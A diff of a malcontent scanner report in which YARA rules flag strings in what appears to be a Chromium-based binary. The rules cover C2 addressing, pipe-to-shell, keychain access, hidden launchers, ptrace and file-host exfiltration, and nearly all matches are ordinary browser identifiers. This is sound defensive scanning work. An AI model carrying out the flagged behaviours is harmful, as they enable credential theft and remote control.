[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_ip](https://github.com/search?q=quic_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code) | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [internalPort](https://github.com/search?q=internalPort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[maxPort](https://github.com/search?q=maxPort&type=code)
[minPort](https://github.com/search?q=minPort&type=code)
[quic_ip](https://github.com/search?q=quic_ip&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[bIp](https://github.com/search?q=bIp&type=code)
[gIp](https://github.com/search?q=gIp&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) | -| MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [clientId](https://github.com/search?q=clientId&type=code)
[client_id](https://github.com/search?q=client_id&type=code) | +| MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code)
[clientId](https://github.com/search?q=clientId&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) | -| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [FrameDropper](https://github.com/search?q=FrameDropper&type=code)
[eye_dropper](https://github.com/search?q=eye_dropper&type=code)
[openEyeDropper](https://github.com/search?q=openEyeDropper&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [Linux](https://github.com/search?q=Linux&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://)
[macOS](https://github.com/search?q=macOS&type=code) | +| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [openEyeDropper](https://github.com/search?q=openEyeDropper&type=code)
[FrameDropper](https://github.com/search?q=FrameDropper&type=code)
[eye_dropper](https://github.com/search?q=eye_dropper&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Linux](https://github.com/search?q=Linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | -| MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEH](https://github.com/search?q=LevelDBEH&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBLeveledLock](https://github.com/search?q=LevelDBLeveledLock&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKeyRange](https://github.com/search?q=LevelDBScopesKeyRange&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_factory](https://github.com/search?q=leveldb_factory&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) | +| MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[LevelDBScopesKeyRange](https://github.com/search?q=LevelDBScopesKeyRange&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[LevelDBLeveledLock](https://github.com/search?q=LevelDBLeveledLock&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_factory](https://github.com/search?q=leveldb_factory&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[LevelDBEH](https://github.com/search?q=LevelDBEH&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite3](https://github.com/search?q=sqlite3&type=code) | | MEDIUM | [credential/keychain](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#keychain) | accesses a keychain | [Keychain](https://github.com/search?q=Keychain&type=code)
[keychain](https://github.com/search?q=keychain&type=code) | | MEDIUM | [credential/sniffer/bpf](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/sniffer/bpf.yara#sniffer_bpf) | BPF (Berkeley Packet Filter) | [bpf](https://github.com/search?q=bpf&type=code) | | MEDIUM | [crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext) | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code)
[openssl](https://github.com/search?q=openssl&type=code) | -| MEDIUM | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | [#"!](https://github.com/search?q=%23%22%21&type=code)
$opt0
$opt1
$opt2
$opt30
$opt4
$opt5
$opt6
$opt7
['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*)(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[](https://github.com/search?q=%83%82%81%80&type=code)
[](https://github.com/search?q=%87%86%85%84&type=code)
[](https://github.com/search?q=%8B%8A%89%88&type=code)
[](https://github.com/search?q=%8F%8E%8D%8C&type=code)
[](https://github.com/search?q=%93%92%91%90&type=code)
[](https://github.com/search?q=%97%96%95%94&type=code)
[](https://github.com/search?q=%9B%9A%99%98&type=code)
[](https://github.com/search?q=%9F%9E%9D%9C&type=code)
[](https://github.com/search?q=%A3%A2%A1%A0&type=code)
[](https://github.com/search?q=%A7%A6%A5%A4&type=code)
[](https://github.com/search?q=%AB%AA%A9%A8&type=code)
[](https://github.com/search?q=%AF%AE%AD%AC&type=code)
[](https://github.com/search?q=%B3%B2%B1%B0&type=code)
[](https://github.com/search?q=%B7%B6%B5%B4&type=code)
[](https://github.com/search?q=%BB%BA%B9%B8&type=code)
[](https://github.com/search?q=%BF%BE%BD%BC&type=code)
[](https://github.com/search?q=%C3%C2%C1%C0&type=code)
[](https://github.com/search?q=%C7%C6%C5%C4&type=code)
[](https://github.com/search?q=%CB%CA%C9%C8&type=code)
[](https://github.com/search?q=%CF%CE%CD%CC&type=code)
[](https://github.com/search?q=%D3%D2%D1%D0&type=code)
[](https://github.com/search?q=%D7%D6%D5%D4&type=code)
[](https://github.com/search?q=%DB%DA%D9%D8&type=code)
[](https://github.com/search?q=%DF%DE%DD%DC&type=code)
[](https://github.com/search?q=%E3%E2%E1%E0&type=code)
[](https://github.com/search?q=%E7%E6%E5%E4&type=code)
[](https://github.com/search?q=%EB%EA%E9%E8&type=code)
[](https://github.com/search?q=%EF%EE%ED%EC&type=code)
[](https://github.com/search?q=%F3%F2%F1%F0&type=code)
[](https://github.com/search?q=%F7%F6%F5%F4&type=code)
[](https://github.com/search?q=%FB%FA%F9%F8&type=code)
[](https://github.com/search?q=%FF%FE%FD%FC&type=code) | +| MEDIUM | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | ['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*)(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[#"!](https://github.com/search?q=%23%22%21&type=code) | | MEDIUM | [crypto/uuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/uuid.yara#random_uuid) | generates a random UUID | [randomUUID](https://github.com/search?q=randomUUID&type=code) | -| MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [base64_encode](https://github.com/search?q=base64_encode&type=code) | -| MEDIUM | [data/embedded/base64_terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [Q0VSVElGSUNBVE::$CERTIFICATE](https://github.com/search?q=Q0VSVElGSUNBVE%3A%3A%24CERTIFICATE&type=code)
[RpcmVjdG9ye::$directory](https://github.com/search?q=RpcmVjdG9ye%3A%3A%24directory&type=code)
[ZGlyZWN0b3J5::$directory](https://github.com/search?q=ZGlyZWN0b3J5%3A%3A%24directory&type=code) | -| MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [aHR0cDovL::$http](https://github.com/search?q=aHR0cDovL%3A%3A%24http&type=code)
[h0dHA6Ly::$http](https://github.com/search?q=h0dHA6Ly%3A%3A%24http&type=code)
[h0dHBzOi8v::$https](https://github.com/search?q=h0dHBzOi8v%3A%3A%24https&type=code)
[odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code)
[odHRwczovL::$https](https://github.com/search?q=odHRwczovL%3A%3A%24https&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | -| MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | +| MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [py_base64_encode::base64_encode](https://github.com/search?q=py_base64_encode%3A%3Abase64_encode&type=code) | +| MEDIUM | [data/embedded/base64_terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [contains_base64::Q0VSVElGSUNBVE](https://github.com/search?q=contains_base64%3A%3AQ0VSVElGSUNBVE&type=code)
[contains_base64::ZGlyZWN0b3J5](https://github.com/search?q=contains_base64%3A%3AZGlyZWN0b3J5&type=code)
[contains_base64::RpcmVjdG9ye](https://github.com/search?q=contains_base64%3A%3ARpcmVjdG9ye&type=code) | +| MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [contains_base64_url::h0dHBzOi8v](https://github.com/search?q=contains_base64_url%3A%3Ah0dHBzOi8v&type=code)
[contains_base64_url::odHRwczovL](https://github.com/search?q=contains_base64_url%3A%3AodHRwczovL&type=code)
[contains_base64_url::aHR0cDovL](https://github.com/search?q=contains_base64_url%3A%3AaHR0cDovL&type=code)
[contains_base64_url::odHRwOi8v](https://github.com/search?q=contains_base64_url%3A%3AodHRwOi8v&type=code)
[contains_base64_url::h0dHA6Ly](https://github.com/search?q=contains_base64_url%3A%3Ah0dHA6Ly&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[[](https://github.com/search?q=%3Chtml%3E&type=code) | +| MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [networkInterfaces](https://github.com/search?q=networkInterfaces&type=code)
[freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code) | | MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | -| MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | +| MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code)
[process.arch](https://github.com/search?q=process.arch&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | -| MEDIUM | [discover/user/USERPROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USERPROFILE.yara#USERPROFILE_Desktop) | Looks up the Desktop directory for the current user | [Desktop](https://github.com/search?q=Desktop&type=code)
[USERPROFILE](https://github.com/search?q=USERPROFILE&type=code) | +| MEDIUM | [discover/user/USERPROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USERPROFILE.yara#USERPROFILE_Desktop) | Looks up the Desktop directory for the current user | [USERPROFILE](https://github.com/search?q=USERPROFILE&type=code)
[Desktop](https://github.com/search?q=Desktop&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | | MEDIUM | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace) | trace or modify system calls | [ptrace](https://github.com/search?q=ptrace&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code)
[ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | -| MEDIUM | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) | +| MEDIUM | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[system](https://github.com/search?q=system&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code) | | MEDIUM | [exec/shell/pipe_sh](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/pipe_sh.yara#pipe_to_shell) | pipes to shell | [| sh](https://github.com/search?q=%7C+sh&type=code) | | MEDIUM | [exec/tty/pathname](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/pathname.yara#ttyname) | returns the pathname of a terminal device | [ttyname](https://github.com/search?q=ttyname&type=code) | -| MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code) | +| MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code) | | MEDIUM | [exfil/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/upload.yara#google_drive) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [drive.google.com/](https://github.com/search?q=drive.google.com%2F&type=code) | | MEDIUM | [fs/file/copy](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-copy.yara#file_copy) | copy files using cp | [copyFile](https://github.com/search?q=copyFile&type=code) | | MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileAndStart](https://github.com/search?q=CreateFileAndStart&type=code)
[CreateFileAndWrite](https://github.com/search?q=CreateFileAndWrite&type=code)
[CreateFileOpenDial](https://github.com/search?q=CreateFileOpenDial&type=code)
[CreateFileToTrunca](https://github.com/search?q=CreateFileToTrunca&type=code)
[CreateFileURLLoade](https://github.com/search?q=CreateFileURLLoade&type=code)
[CreateFileWriterIm](https://github.com/search?q=CreateFileWriterIm&type=code) | @@ -50,11 +50,11 @@ | MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#utimes) | [change file last access and modification times](https://linux.die.net/man/2/utimes) | [utimes](https://github.com/search?q=utimes&type=code) | | MEDIUM | [fs/path/etc_hosts](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-hosts.yara#etc_hosts) | references /etc/hosts | [/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code) | | MEDIUM | [fs/path/root](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/root.yara#root_path_val) | path reference within /root | [/root/root-legacy.js](https://github.com/search?q=%2Froot%2Froot-legacy.js&type=code)
[/root/root.js](https://github.com/search?q=%2Froot%2Froot.js&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/__v8_gc__](https://github.com/search?q=%2Ftmp%2F__v8_gc__&type=code)
[/tmp/chromium-upload-XXXXXXXXXXXXXXXX](https://github.com/search?q=%2Ftmp%2Fchromium-upload-XXXXXXXXXXXXXXXX&type=code)
[/tmp/node-repl-sock](https://github.com/search?q=%2Ftmp%2Fnode-repl-sock&type=code)
